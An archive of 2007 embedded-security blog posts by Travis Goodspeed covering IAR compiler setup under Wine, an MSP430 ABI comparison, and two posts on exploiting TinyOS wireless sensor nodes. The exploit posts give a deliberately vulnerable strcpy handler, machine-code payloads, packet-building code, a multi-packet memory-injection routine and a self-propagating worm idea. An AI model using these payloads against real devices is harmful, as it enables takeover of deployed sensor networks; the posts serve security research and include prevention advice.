Friday, November 30, 2007

TI EZ430 in Linux with IAR Kickstart

by Travis Goodspeed [travis at utk.edu]
at the Extreme Measurement Communications Center
of the Oak Ridge National Laboratory


What follows are instructions for running the free version of IAR's C compiler for the MSP430 with Texas Instruments' EZ430 development tool in Linux under Wine. This will not work for Mac OS X until msp430-gdbproxy is made available for that platform. Also, this might not work with the full version of the compiler.

These instructions assume that you've installed wine, mspgcc, and msp430-gdbproxy. The assumption is also made that you've purchased the EZ430-F2013 development tool from Texas Instruments.

IAR Embedded Workbench



First, download slac050q.zip from the EZ430-F2013 page. Unzip it to get FET_R510.exe. Running wine FET_R510.exe installs the compiler to your C: drive under wine.



Next, you must find the executable and run it.

karen% find ~/.wine/drive_c -name icc\*.exe
/home/travis/.wine/drive_c/Program Files/IAR Systems/Embedded Workbench 4.0/430/bin/icc430.exe
karen% wine "C:\Program Files\IAR Systems\Embedded Workbench 4.0\430\bin\icc430.exe"
IAR MSP430 C/C++ Compiler V4.09A/W32 [Kickstart]
Copyright 1996-2007 IAR Systems. All rights reserved.

Available command line options:
--char_is_signed
'Plain' char is treated as signed char
--core {430|430X}
The processor core
430 (default)
430X
--data_model {small|medium|large}
Select data model (only for 430X core)
small Small model
16 bit registers. __data16 default. (default)
medium Medium model
20 bit registers. __data16 default. __data20 allowed.
large Large model
20 bit registers. __data20 default. __data16 allowed.
--debug
-r Insert debug info in object file
--dependencies=[i][m] file|directory
List file dependencies
i Include filename only (default)
m Makefile style
--diagnostics_tables file|directory
Dump diagnostic message tables to file
--diag_error tag,tag,...
Treat the list of tags as error diagnostics
--diag_remark tag,tag,...
Treat the list of tags as remark diagnostics
--diag_suppress tag,tag,...
Suppress the list of tags as diagnostics
--diag_warning tag,tag,...
Treat the list of tags as warning diagnostics
--discard_unused_publics
Discard unused public functions and variables (experimental)
--dlib_config pathname
Specify DLib library configuration file
--double {32|64}
The size of the double floating point type
32 32 bits (default)
64 64 bits
--ec++ Embedded C++
--eec++ Extended EC++ (EC++ with templates/namespaces/mutable/casts)
--enable_multibytes
Enable multibyte support
--error_limit limit
Stop after this many errors (0 = no limit)
--header_context
Adds include file context to diagnostics
--library_module
Make a library module
--lock_r4 Exclude register R4 from use by the compiler
--lock_r5 Exclude register R5 from use by the compiler
--mfc Enable multiple file compilation (experimental)
--migration_preprocessor_extensions
Enable IAR migration preprocessor extensions
--misrac Enable MISRA C diagnostics (not available)
--misrac_verbose
Enable verbose MISRA C messages (not available)
--module_name name
Set module name
--no_code_motion
Disable code motion
--no_cse Disable common sub-expression elimination
--no_fragments Do not generate section fragments
--no_inline Disable function inlining
--no_path_in_file_macros
Strip path from __FILE__ and __BASE_FILE__ macros
--no_tbaa Disable type based alias analysis
--no_typedefs_in_diagnostics
Don't use typedefs when printing types
--no_unroll Disable loop unrolling
--no_warnings Disable generation of warnings
--no_wrap_diagnostics
Don't wrap long lines in diagnostic messages
--omit_types Omit function/variable type info in object output
--only_stdout Use stdout only (no console output on stderr)
--output file|path
-o file|path Specify object file
--pic Generate position independent code
--preinclude filename
Include file before normal source
--preprocess=[c][n][l] file|directory
Preprocessor output
c Include comments
n Preprocess only
l Include #line directives
--public_equ symbol[=value]
Define public assembler symbol (EQU)
--reduce_stack_usage
Reduce usage of stack at the cost of larger and slower code
--regvar_r4 Allow register R4 to be used as a global register variable
--regvar_r5 Allow register R5 to be used as a global register variable
--remarks Enable generation of remarks
--require_prototypes
Require prototypes for all called or public functions
--save_reg20 Save 20-bit registers in interrupt functions
--silent Silent operation
--strict_ansi Strict ANSI rules
--warnings_affect_exit_code
Warnings affect exit code
--warnings_are_errors
All warnings are errors
-D symbol[=value]
Define macro (same as #define symbol [value])
-e Enable IAR C/C++ language extensions
-f file Read command line options from file
-I directory Add #include search directory
-l[c|C|D|E|a|A|b|B][N][H] file|directory
Output list file
c C source listing
C with assembly code
D with pure assembly code
E with non-sequential assembly code
a Assembler file
A with C source
b Basic assembler file
B with C source
N Don't include diagnostics
H Include header file source lines
-O[n|l|m|h|hs|hz]
Select level of optimization:
n No optimizations
l Low optimizations (default)
m Medium optimizations
h High optimizations
hz High optimizations, tuned for small code size
hs High optimizations, tuned for high speed
(-O without argument) The same setting as -Oh
-s{0-9} Optimize for speed:
0-2 Debug
3 Low
4-6 Medium
7-9 High
-z{0-9} Optimize for size:
0-2 Debug
3 Low (default)
4-6 Medium
7-9 High
karen%


The usage information will be valuable, but is too long to scroll through. Pipe it to a textfile for later reference. Also, make some symlinks to more easily get at include files and the documentation:

karen% sudo ln -s /home/travis/.wine/drive_c/Program\ Files/IAR\ Systems/Embedded\ Workbench\ 4.0 /opt/IAR
karen% ls /opt/IAR/430/doc/
EW430_AssemblerReference.pdf HelpMISRAC.chm embOS_IAR_plugin.pdf
EW430_CompilerReference.pdf IAR_Systems.jpg ew430.htm
EW430_MigrationGuide.pdf MSP-FET430 Users Guide.pdf htm.gif
EW430_UserGuide.pdf a430.htm icc430.htm
EW_MisraCReference.pdf a430_msg.htm icc430_msg.htm
Help430Compiler.chm appnotes migration.htm
Help430Contents.ENU.chm clib.pdf pdf.gif
Help430IDE1.chm cs430.htm readme.htm
Help430IDE2.chm embOSRelease.htm uC-OS-II-KA-CSPY-UserGuide.pdf
karen%


Make scripts for both the compiler and the assembler. I'm uninterested in the IDE.

#!/bin/sh
#/usr/local/bin/a430
wine "C:\Program Files\IAR Systems\Embedded Workbench 4.0\430\bin\a430.exe" $*

#!/bin/sh
#/usr/local/bin/icc430
wine "C:\Program Files\IAR Systems\Embedded Workbench 4.0\430\bin\icc430.exe" $*



The compiler's options are very different from those of GCC, and you must remember (or update your script) to include the IAR include directory if you intend to use its headers. A test compile of the LED blinker from slac080b.zip follows.

karen% icc430 -I "Z:\opt\IAR\430\inc" msp430x20x3_1.c --output blink.exe

IAR MSP430 C/C++ Compiler V4.09A/W32 [Kickstart]
Copyright 1996-2007 IAR Systems. All rights reserved.

34 bytes of CODE memory
0 bytes of DATA memory (+ 4 bytes shared)

Errors: none
Warnings: none
karen%


Now that the compiler is working, you'll need a linker. I use the following script:

#!/bin/sh
opts="-f Z:\opt\IAR\430\config\lnk430F2013.xcl -Fintel-standard Z:\opt\IAR\430\LIB\CLIB\cl430f.r43 -s __program_start "
xlink="C:\Program Files\IAR Systems\Embedded Workbench 4.0\common\bin\xlink.exe"
wine "$xlink" $* $opts

msp430-objcopy aout.a43 aout.exe


The format switch, -Fintel-standard, makes the output file in the ihex format, one which msp430-objcopy can handle. This will let us program the board using msp430-gdb, so the GNU tools may be used to load the executable. Also note that you'll need to uncomment lines 76 and 77 of /opt/IAR/430/config/lnk430F2013.xcl to define the stack and heap sizes. This script is called as xlink msp430x20x3_1.r43.

The following is a functional, if inelegant, Makefile:

ALL=msp430x20x3_1.exe

all: $(ALL)

msp430x20x3_1.r43: msp430x20x3_1.c
icc430 -I "Z:\opt\IAR\430\inc" msp430x20x3_1.c
msp430x20x3_1.exe: msp430x20x3_1.r43
xlink msp430x20x3_1.r43
cp aout.exe msp430x20x3_1.exe



GDB



Assuming that msp430-gdb and the USB-FET drivers have been properly installed, the GDB server can be loaded as

karen% msp430-gdbproxy msp430 --spy-bi-wire /dev/ttyUSB0

Remote proxy for GDB, v0.7.1, Copyright (C) 1999 Quality Quorum Inc.
MSP430 adaption Copyright (C) 2002 Chris Liechti and Steve Underwood

GDBproxy comes with ABSOLUTELY NO WARRANTY; for details
use `--warranty' option. This is Open Source software. You are
welcome to redistribute it under certain conditions. Use the
'--copying' option for details.

debug: MSP430_Initialize()
debug: MSP430_Configure()
debug: MSP430_VCC(3000)
debug: MSP430_Identify()
info: msp430: Target device is a 'MSP430F20x3' (type 52)
debug: MSP430_Configure()
notice: msp430-gdbproxy: waiting on TCP port 2000


Your ~/.gdbinit file should be

set remoteaddresssize 16
set remotetimeout 999999
target remote localhost:2000
monitor interface spy-bi-wire


msp430-gdb runs with no options. Use load foo.exe to load an executable that has been made by msp430-objcopy.


karen% msp430-gdb
GNU gdb 6.0
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "--host=i686-pc-linux-gnu --target=msp430".notice: msp430-gdbproxy: connected
debug: MSP430_Registers(READ)
0x0000f800 in ?? ()

(gdb) load aout.exe
Loading section .sec1, size 0x38 lma 0xf800
debug: MSP430_Memory(WRITE)
Loading section .sec2, size 0x2 lma 0xfffe
debug: MSP430_Memory(WRITE)
Start address 0xf800, load size 58
Transfer rate: 464 bits in <1>


Note that without "monitor interface spy-bi-wire" in .gdbinit and "--spy-bi-wire" to msp430-gdbproxy, load will still work but many debugging functions will not. Also note that the run command seems to have issues with spy-bi-wire; use continue instead.

You should now be able to play around with the MSP430. Grab the msp430f2013 datasheet and family guide if you'll be doing anything fancy.

Monday, September 24, 2007

ToorCon 9 Presentation

I'll be presenting some of my wireless sensor network security research at ToorCon 9 in San Diego on Saturday, October the 20th at 17h00 Pacific time.

update:
I've posted the slides from the presentation at http://frob.us/~travis/2007oct_toorcon.pdf. A DVD is also available; contact the conference organizers for a copy.

Sunday, September 23, 2007

Memory-Constrained Code Injection

by Travis Goodspeed <travis at utk.edu>
at the Extreme Measurement Communications Center
of the Oak Ridge National Laboratory

Introduction


When injecting code into an embedded system, as has demonstrated in the prior article, entitled MSP430 Buffer Overflow Exploit for Wireless Sensor Nodes, the limitation of code size frequently comes up. The following will explain how a 128-byte packet can be used to inject an exploit much longer than itself. This method would also work in workstation and server attacks, but is less valuable in such environments because such platforms lack the prohibitive memory constraints that are to be found in embedded systems.

It is assumed that the reader is familiar with the previously referenced article, and it is further assumed that a method for injecting short fragments of machine code exists. These examples are specific to TinyOS 2.x on the MSP430, but the principles in question should be of relevance for any resource-constrained target over a datagram channel of limited packet size.

General


The method which will be presented makes use of unallocated memory as a buffer into which a large payload, one that is larger than any individual packet, is populated by a series of code injections, each of which loads a short piece of the larger payload before returning to normal execution.

Each packet will set a single word of memory to a word from its payload, thus copying as many words as are required from the attacker to the victim, loading them at whatever address is specified. So long as the target address lies beneath the stack and above the heap, it will not interfere with the operation of the victim's firmware and will not be damaged or overwritten by another subroutine.

The memory layout looks something like this:

(Top of Memory, 0xFFFF)
Internal Flash{
Interrupt Vector Table
Data/Code
}
Internal Ram{
Stack (grows down)
Unused (between heap and stack)
Heap (grows up, often empty)
Globals
Memory-mapped I/O
}
(Bottom of Memory, 0x0000)


The payload will be housed in the unused region between the stack, which grows downward from the top of memory, and the heap, which grows upward from the bottom of memory.

Specific


Suppose that an attacker is capable of broadcasting packets which allow for a six-byte payload to be executing on a victim. Further, suppose that the attacker wishes to execute a single block PB of 256 bytes of machine code at address TA, within a contiguous region and without interruption.

The attacker can craft a memory-injection (MI) packet which sets an address to a value. In MSP430 assembly, this is expressed as
MOV.W #val, &addr
which sets the word at memory location addr to val. To place the value DEAD at the memory location BEEF, one would use
MOV.W #0xdead, &0xbeef
As machine language using absolute addressing, this would be
{0x40b2, 0xdead, 0xbeef}
The latter two words may be substituted as required, making it trivial to have a function write injection code on the fly, such as


/*! Takes a pointer to a six-byte region which is populated
* with machine code for setting the value at the address.
*/
void attackcode_set(uint16_t *code,
uint16_t address,
uint16_t value){
code[0]=0x40b2;
code[1]=value;
code[2]=address;
}


Thus to copy an expanse of code to the victim, the attacker would compose 128 injection attacks by composing payloads with the following loop:

//Populate the buffer MI with memory injections to place all of PB at TA
for(int i=0;i<0x50;i++)
attackcode_set(MI[i], TA+2*i, PB[i]);


Each packet of MI[] is then broadcast in any order whatsoever. As each packet is received, another two bytes near TA, the target address, are set. Thus, two bytes at a time, the whole payload is transfered to the victim. Once they've been delivered, a new injection is passed but one that doesn't execute itself. Rather, it jumps to TA to begin the previously loaded code, all 256 bytes of it.

Injection of Complete Firmware


Once this longer payload has been installed, it can be used to copy a portion of itself to external flash. This can be repeated until a complete firmware--that is to say software which resides in internal flash--exists on external flash. Then a short loader routine could copy it from external to internal flash, thereby replacing the victim's firmware with the attacker's. If this new firmware were to begin broadcasting its own installation routine, the result would be a self-propagating worm.

Conclusion


One should never assume that an embedded platform is safe from a sophisticated injection behavior because of the limitations imposed by a datagram networking framework, such as 802.15.4. Even without streaming or the buffering of prior packets, it's possible--in fact rather trivial--to inject a payload significantly larger than the packet size.

Please contact me if you know of any prior implementation or discussion of this technique. I would be much obliged.

Friday, August 3, 2007

MSP430 Buffer Overflow Exploit for Wireless Sensor Nodes

by Travis Goodspeed <travis at radiantmachines.com>


Abstract



What follows is a detailed account of the creation of a stack-overflow exploit targeting TinyOS 2.x on a Tmote Sky wireless sensor node, which uses the Texas Instruments MSP430 microcontroller. An example application is used as a target, rather than one which might be found in the wild. A firm knowledge of C, assembly language, and embedded systems architectures is assumed, but the details of NesC, the MSP430, and TinyOS are reviewed for those new to this platform. Finally, preventative measures are discussed.

Before We Begin


By default, the NesC compiler attaches the inline keyword to every function that it generates, even if that function began as a C function. To prevent this, use __attribute__ ((noinline)). Without this attribute, you'll go through hell trying to understand a function with twenty others embedded within it. Note that the inline keyword isn't what makes these attacks possible, it just makes them easier to understand.

Disassembly


I'll begin with a short example which uses gdb on a local image of a simple TinyOS application. This requires msp430-gdb, but does not require a JTAG debugger or any physical hardware.

Use the "disassemble" command to view an individual function.

(gdb) disassemble RadioCountToLedsC$red
Dump of assembler code for function RadioCountToLedsC$red:
0x000053f4 <radiocounttoledsc$red+0>: mov.b #1, r15 ;r3 As==01
0x000053f6 <radiocounttoledsc$red+2>: call #21500 ;#0x53fc
0x000053fa <radiocounttoledsc$red+6>: ret
End of assembler dump.
(gdb)
The original source for for this was
//within RadioCountToLedsC implementation
void __attribute__ ((noinline)) red(){
call Leds.set(1);
}


Note that the function acts just as its C equivalent would. red+0 loads the constant #1 from the constant generator r3 into r15, the register which contains the first parameter to a C function in the MSP430 version of GCC. A call is then made to 0x53fc, which we know as Leds.set().


Disassemble also accepts an address as its argument, so let's take a peek under the hood and see what Leds.set() does.

(gdb) disassemble 0x53fc
Dump of assembler code for function LedsP$Leds$set:
0x000053fc <ledsp$leds$set+0>: push r11 ;
0x000053fe <ledsp$leds$set+2>: mov.b r15, r11 ;
0x00005400 <ledsp$leds$set+4>: call #16460 ;#0x404c
0x00005404 <ledsp$leds$set+8>: mov.b r15, r14 ;
0x00005406 <ledsp$leds$set+10>: mov.b r11, r15 ;
0x00005408 <ledsp$leds$set+12>: and.b #1, r15 ;r3 As==01
0x0000540a <ledsp$leds$set+14>: jz $+10 ;abs 0x5414
0x0000540c <ledsp$leds$set+16>: and.b #-17, &0x0031 ;#0xffef
0x00005412 <ledsp$leds$set+22>: jmp $+8 ;abs 0x541a
0x00005414 <ledsp$leds$set+24>: bis.b #16, &0x0031 ;#0x0010
0x0000541a <ledsp$leds$set+30>: mov.b r11, r15 ;
0x0000541c <ledsp$leds$set+32>: and.b #2, r15 ;r3 As==10
0x0000541e <ledsp$leds$set+34>: jz $+10 ;abs 0x5428
0x00005420 <ledsp$leds$set+36>: and.b #-33, &0x0031 ;#0xffdf
0x00005426 <ledsp$leds$set+42>: jmp $+8 ;abs 0x542e
0x00005428 <ledsp$leds$set+44>: bis.b #32, &0x0031 ;#0x0020
0x0000542e <ledsp$leds$set+50>: mov.b r11, r15 ;
0x00005430 <ledsp$leds$set+52>: and.b #4, r15 ;r2 As==10
0x00005432 <ledsp$leds$set+54>: jz $+10 ;abs 0x543c
0x00005434 <ledsp$leds$set+56>: and.b #-65, &0x0031 ;#0xffbf
0x0000543a <ledsp$leds$set+62>: jmp $+8 ;abs 0x5442
0x0000543c <ledsp$leds$set+64>: bis.b #64, &0x0031 ;#0x0040
0x00005442 <ledsp$leds$set+70>: mov.b r14, r15 ;
0x00005444 <ledsp$leds$set+72>: call #16480 ;#0x4060
0x00005448 <ledsp$leds$set+76>: pop r11 ;
0x0000544a <ledsp$leds$set+78>: ret
End of assembler dump.
(gdb)


Note that this comes from the NesC declaration of
async command void set(uint8_t val);

which suggests that commands are rendered straight to C functions with the call keyword merely calling the function. In actual usage, call is used not to determine the way in which the function is called, but whether it's allowed. A command may not be called from an interrupt handler unless it also possesses the async keyword. Note that set() would have been automatically inlined if it had not been called from multiple source functions.

Inline Assembly



Inline assembly language is quite easy as well. Suppose that we would like to find the value of the stack pointer:
  int __attribute__ ((noinline))
getsp(){
__asm__("mov r1, r15");
}

The preceding code simply copies r1, the Stack Pointer, into r15, which mspgcc's ABI uses as the return register. Testing the disassembled code gives us:
(gdb) disassemble RadioCountToLedsC$getsp
Dump of assembler code for function RadioCountToLedsC$getsp:
0x000053f4 <RadioCountToLedsC$getsp+0>: mov r1, r15 ;
0x000053f6 <RadioCountToLedsC$getsp+2>: ret
End of assembler dump.
(gdb)


Note the use of r15 is arbitrary--different compilers use the registers for different things. I've written an article comparing IAR's ABI to that of GCC which explains the issue in detail.

Machine Language



The following msp-gdb session shows how to get the getsp() function as its machine-language bytes rather than as disassembled code:
(gdb) x/bx RadioCountToLedsC$getsp
0x53f4 <RadioCountToLedsC$getsp>: 0x0f
(gdb)
0x53f5 <RadioCountToLedsC$getsp+1>: 0x41
(gdb)
0x53f6 <RadioCountToLedsC$getsp+2>: 0x30
(gdb)
0x53f7 <RadioCountToLedsC$getsp+3>: 0x41
(gdb)

In the above example, x/bx means "examine as hexadecimal bytes." I could also have used x/hx to examine half-word bytes (words are 32 bit here, not 16), but the little-endian nature of the target platform makes that a little confusing, as the bytes are printed out of order.

What this means is that we can declare a C byte array of {0x0f,0x41,0x30,0x41} or a string of "\x0f\x41\x30\x41" at any even address and execute a call to its address in order to execute it. The even addressing is essential, as r0--the PC--cannot hold an unaligned address and unaligned word accesses are not supported by the MSP430. Because this architecture is little endian, the code as a 16-bit integer array is not {0x0f41, 0x3041} but rather {0x410f,0x4130}.

I've been using gcc and gdb to generate machine code, but the mspgcc project has made a single-instruction assembler available through the web. Remember that it gives results as little-endian words.

Instruction Emulation



It's important to realize that MSP430 assembly language contains many statements which don't exist on the physical chip. Instead they're emulated by translation in the assembler.

For example, suppose we have the following function using inline assembly:
  void __attribute__ ((noinline))
setled(){
asm("inv &0x0031");
}


INV is an emulated instruction which flips the bits of its destination by XORing them with 0xFFFF. Why should the chip have a separate instruction, when the programmer could simply call XOR #-1,&0x0031? In practice, that is what happens as our disassembly shows:
(gdb) disassemble BlinkC$setled
Dump of assembler code for function BlinkC$setled:
0x00004712 <BlinkC$setled+0>: xor #-1, &0x0031 ;r3 As==11
0x00004716 <BlinkC$setled+4>: ret
End of assembler dump.
(gdb)


Machine Language Execution Example


After a bit of effort, which would've been greatly reduced if my Flash Emulation Tool had arrived, I came up with the following piece of code:
int machlang[15]={
0xe3b2, 0x0031, //xor #-1,&0x31 (emulating INV)
0x4130 //ret
};
int (*machfn)() = NULL;
machfn= (int (*)()) machlang;
machfn();


The above code executes the machine language code to blink the LED by inverting the memory-mapped port at 0x31. The integers of machlang() may reside anywhere in the memory space, which is to say anywhere in RAM or ROM.

Buffer Overflow Stack Injection



Machine language injection works by virtue of the call stack, which grows downward in TinyOS from nearly the top of RAM (high address) to the bottom of RAM (low address, 0x200). When a function begins, the stack's lowest word contains the address of the calling function, such that when a function calls the "RET" instruction, it copies a value from the address pointed to by R1 (SP) into R0 (PC) and increments R1 to shrink the stack by a word.

The following code overwrites the stack's stored copy of the calling PC such that when it returns, control jumps to machlang instead of the calling function:
void __attribute__ ((noinline))
setled(){
//call it the rude way by overwriting the return address
int *oldpc=&oldpc;//point to top of frame
oldpc++;//inc by 2, not 1
*oldpc=machlang;//overwrite old PC
return;//return to machlang, not calling function
}


In the above code, the pointer oldpc is declared and incremented such that it points at the stack value pushed before itself, which is of course the stored PC value that the function will jump to when it returns. When return; is called, the processor jumps not to the calling function but rather to the machine code, causing it to be executed.

Buffer overflow injections work in a similar way, but rather than set the pointer explicitly by C code, they instead have a string that--when copied into a buffer--exceeds the end of the buffer and writes to the next position. The following code does just that, by calling strcpy() on a string composed of the machine language entry address repeated many times.
//code fragment: composition function
//compose a null-terminated string
//of repeating machlang addresses
for(payload=evilcmd;
payload<evilcmd+10;
payload++){
*payload=machlang;
}
*payload=0;//null-terminator

//code fragment, copying function
char cmd[6]="Hello";
strcpy(cmd,evilcmd);
return;//to machlang

//new machlang to enter an infinite loop.
int machlang[30]={
0xe3b2, 0x0031, //xor #-1,&0x31 (emulating INV)

//while(1);
0x4303, //mov r3,r3 (emulating NOP)
0x3fff, //jmp -2
};


This is a bit crude, in that it overwrites more than just the stored PC. Note, however, that the string can be dropped in with no specialized code in the copying function. In order to view the success of this, the machlang array must be changed to enter an infinite loop when complete. It cannot successfully return because it overwrote more than just the stack pointer it intended to. This is an unavoidable side-effect when the stack is as dense as it is on the MSP430, as the null terminator must be copied--thus unless the high word--that is the latter word in little endian--of the target address happens to be 0x00, the address immediately above that which we intend to overwrite must necessarily be clobbered.

Using a JTAG debugger (TI MSP-FETP430-PIF or TI MSP-FET430-UIF), it's trivial to view the stack. You'll notice that the stack is rather shallow, only two functions deep. As 'BlinkC$Timer0$fired' is called without stack parameters--those that don't fit into registers--a simple RET suffices to return past it. If parameters were on the stack, they could be removed with the POP instruction.

(gdb) break 'BlinkC$setled'
Breakpoint 1 at 0x4d46: file BlinkC.nc, line 99.
(gdb) continue
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
BlinkC$setled () at BlinkC.nc:99
(gdb) where
#0 BlinkC$setled () at BlinkC.nc:99
#1 0x00004d46 in BlinkC$Timer0$fired () at BlinkC.nc:128
#2 0x00004d46 in BlinkC$Timer0$fired () at BlinkC.nc:128
(gdb)


A Complete Exploit



Now that we've got machine code and a way to force it onto the stack, we are still left with the issue of knowing at which address it will be. On a workstation, desktop, or server, it's common practice to include NOP instructions before the code you intend to execute, such that you can guess at the target address. On x86 processors, this is particularly easy because of support for a byte-length NOP instruction (0x90) and unaligned access.

Wireless sensor nodes and other embedded systems require a different strategy. The payload of a packet is often so small that a single packet has barely got room for anything interesting, much less a bunch of word-length NOP instructions (0x4303, which is really MOV r3,r3). Fortunately, these systems emphasize static allocation. malloc() and similar usage of a heap is strongly discouraged, to the point that much documentation claims the method doesn't exist.

A consequence of static allocation is that of twenty nodes running the same firmware, twenty nodes will have every non-stack variable in the same location. This includes the functions which handle reception of an incoming packet. Thus, the easiest way to inject code into a live wireless sensor node by a single 802.15.4 packet is to craft a packet which--when copied over the stack--overwrites the return address with the address of the global copy of itself, not the stack's copy.

Executing the stack's copy is also possible, of course.

Target Application



For an example of a remote exploit, I threw together a simple application that accepts the shortened name of a color--RED, GREN, or BLUE--within a packet and enables the appropriate LED. The code is below:


void __attribute__ ((noinline))
docmd(radio_count_msg_t* rcm){

char cmd[6];
strcpy(cmd,rcm->cmd);


if(!strcmp(cmd,"RED"))
call Leds.set(1);
if(!strcmp(cmd,"GREN"))
call Leds.set(2);
if(!strcmp(cmd,"BLUE"))
call Leds.set(4);
return;
}

event message_t* Receive.receive(message_t* bufPtr,
void* payload, uint8_t len) {
char cmd[6];
radio_count_msg_t* rcm = (radio_count_msg_t*)payload;
docmd(rcm);

return bufPtr;
}




The first step is to determine where the packet resides in memory on the victim. I suppose it's possible to dig around TinyOS for the symbol of packet, but when debugging symbols might not be available, a more reliable technique is to search for the contents of the last packet sent:
(gdb) x/s 0x2a2
0x2a2: "\006RED"
(gdb)


Trying again for a different packet, at the same address I find
(gdb) x/s 0x2a2
0x2a2: "\006BLUE"
(gdb)


And one last time for the green led, I find
(gdb) x/s 0x2a2
0x2a2: "\006GREN"
(gdb)


At each stage, the light matches the string being given. This gives me both good and bad news. The good news is that my packet gets through, the bad news is that it's mis-aligned. The "\006" character is at 0x2a2, which means that the packet's string doesn't begin until 0x2a3, which is an odd address. Machine code may only reside at even addresses on the MSP430 and many other processors, with the X86 being a notable exception.

Once the target address is known, crafting an attack is as simple as stuffing the following things into the packet:
1. The executable machine code, even-aligned in the global packet.
2. The entry address off the machine code, even-aligned in the overflow onto the stack, offset such that it overwrites the program counter.
3. A terminating null character or word, such that strcpy() or its equivalent doesn't hit flash ROM.

These rules can be quite a juggling act, but expressed for the above example:
1. Executable code should begin at the second letter of the enclosed string, which will be 0x02a4 on the target.
2. 0x02a4 (0xa4 0x02 as bytes) must reside in bytes 7 and 8 of the string.
3. The string must end in zeros.
4. The first letter must not be a zero.

While it's not terribly difficult to do these things on paper, it's cleaner to do it in C. First we define our machine code in an array, as we did before:

volatile int machlang[30]={
//garbage;
0xdead,
0xbeef,

//to be obliterated
0x0f01,
0x0f02,

//to be executed
0xe3b2, //inv 0x0031
0x0031,
0x3ffd, //jmp -4
0x0000,
};


This has a lot of empty space and doesn't contain as much information as it might. The machine code in the suffix just blinks the LEDs in an infinite while loop, though in practice they blink faster than the human eye can see. The following code packs the machine code and the target address into a single string for sending as a packet. Note that the address and the machine code are differently aligned. This is because the address must be even aligned with the destination of the strcpy(), while the machine code must be evenly aligned in the source.

void __attribute__ ((noinline))
build_exploit(void* vstr)
{
char *str=(char*)vstr;
//machlang has zeroes, so it may not be used before the address.
//load the machine code, with weird but correct offset.
memcpy(attack+1,&machlang,16);

//load the attack address
memcpy(attack+6,&attackinit,2);

attack[8]=0;//zero out end, just in case.
memcpy(str,attack,20);
}



Prevention



Randomizing addresses would make these attacks more difficult to stage, particularly if every node ran a different build, such that no two nodes would store incoming packets at the same address. The compiler could also push an object of random size onto the stack such that it would follow a sort of drunkard's walk to prevent stack code from being jumped to.

A still more effective alternative would be an addition to the MSP430 itself, one that would branch to an exception handler if the program counter were ever outside of flash memory. This isn't a workstation, and there's rarely any reason to execute instructions from RAM. Thus, a simple register configuration which enabled and disabled execution from RAM would make the platform much more difficult to exploit.

As always, null-terminated string functions of unspecified length should never be used. There are other mistakes that make the stack vulnerable to corruption, but this is by and large the most common. strcpy() and its like should have been culled from the C language decades ago, but they're still with us and still being taught in introductory computer science classes.

I gave an informal introduction to this technique at the 2007 ACS Control Systems Cyber Security Conference in Knoxville, Tennessee. By far, the most common objections were that cryptography made this un-exploitable in practice or that the fence-line prevented malicious packets from reaching the target system.

Although it's true that cryptographically verifying received packets makes code injection more difficult, it does not make such injection impossible. Key management must have such a strict policy that a stolen node is de-authorized before an attacker can attach a JTAG cable to forcibly grab the key. Further, the JTAG fuse ought to be burned such that the node must be taken off-site for firmware extraction.

Regarding the fence-line, it's just a line in the sand as far as an attacker is concerned. 2.4Ghz amplifiers are rather easy to acquire, and the 150 meter range listed on the radios spec-sheet doesn't apply when an extra amplifier is attached. Even if we assume that the fence-line is effective--such as on a submarine--it's still possible to either bribe or trick an authorized employee into bringing a transmitter within the fence, or a packet sniffer in and then back out.

Thursday, August 2, 2007

On the IAR MSP430 C Compiler's Inefficient Register Utilization

Recently, I've been digging into the documentation of Texas Instruments' MSP430 micro-controller family. After covering the CPU itself, I continued into the documentation[1] for the mspgcc project, a port of GCC to the MSP430. After realizing that the ABI used for mspgcc had never been defined in the chip's documentation[3], I dug up the manual[2] for IAR's compiler and compared the two.

I quickly discovered that IAR's compiler wastes registers when passing 16-bit parameters to a C function. By its ABI, the first 16-bit parameter is placed into R12 and the second into R14. R13 and R15 remain unused, as they are reserved for the high words of 32-bit parameters. GCC follows the much more logical route of only assigning a single register to a 16-bit value, such that R15 is used for the first parameter, R14 for the second, R13 for the third, and R12 for the fourth. This allows it to accept four parameters by register, while IAR's compiler will push the third and fourth onto the stack while leaving two clobber registers unused!


To demonstrate this, I have compiled a simple C program containing only a function foo() which returned the sum of its four inputs and a main() method to call foo(). This was compiled to assembly language using mspgcc 3.2.3 and IAR MSP430 C/C++ Compiler V3.42A/W32.

In both compilers, four assembly instructions were used to add the values and return the result in the single register of the first parameter, R12 for IAR and R15 for GCC. The table below lists the assembly generated by each compiler, with instructions converted from the GCC format (lowercase, .W omitted) to the IAR format for clear comparison. GCC, by virtue of its more efficient register usage, avoids both having to PUSH.W two parameters onto the stack and avoids having to use the indexed addressing mode, as X(SP), within the function.





IAR CompilerGCC Compiler


foo:
ADD.W R14, R12 //1 cycle, 1 word
ADD.W 0x2(SP), R12 //3c,2w
ADD.W 0x4(SP), R12 //3c,2w
RET



foo:
ADD.W R14, R15 //1c,1w
ADD.W R13, R15 //1c,1w
ADD.W R12, R15 //1c,1w
RET



Pages 3-72 and 3-73 of the MSP430 Family Guide[3] detail the full cost of these additions, which increase not only the runtime but also the storage requirements of the function. According to those pages, "ADD.W r14,r15" takes 1 cycle and 1 word of memory while "ADD.W 0x2(SP), R12" takes 3 cycles and 2 words of memory. Additionally, each of the two PUSH.W statements required to call foo() in the IAR compiler takes 3 cycles, which are unnecessary in GCC.

Texas Instruments' Code Composer Essentials does not suffer from IAR's inefficiency; rather, it uses an ABI similar to but incompatible with GCC. TICCE allocates register R12 for the first parameter, then R13, R14, and R15. The result is returned in R12. GCC uses registers in the opposite order and returns in R15. See the Users Guide[4] for more details.

What's the reasoning behind IAR's design? It makes functions of two 32-bit values easily compatible with those of two 16-bit values, but this compatibility breaks as soon as the third parameter comes into play, which is pushed onto the stack as a single word. If such compatibility were essential, the trick could be maintained by using R13 for the third parameter and R15 for the fourth.

Sources:
[1] mspgcc manual
[2] IAR manuals
[3] Texas Instruments's MSP430 Family Guide
[4] MSP430 Optimizing C/C++ Compiler User's Guide (SLAU132)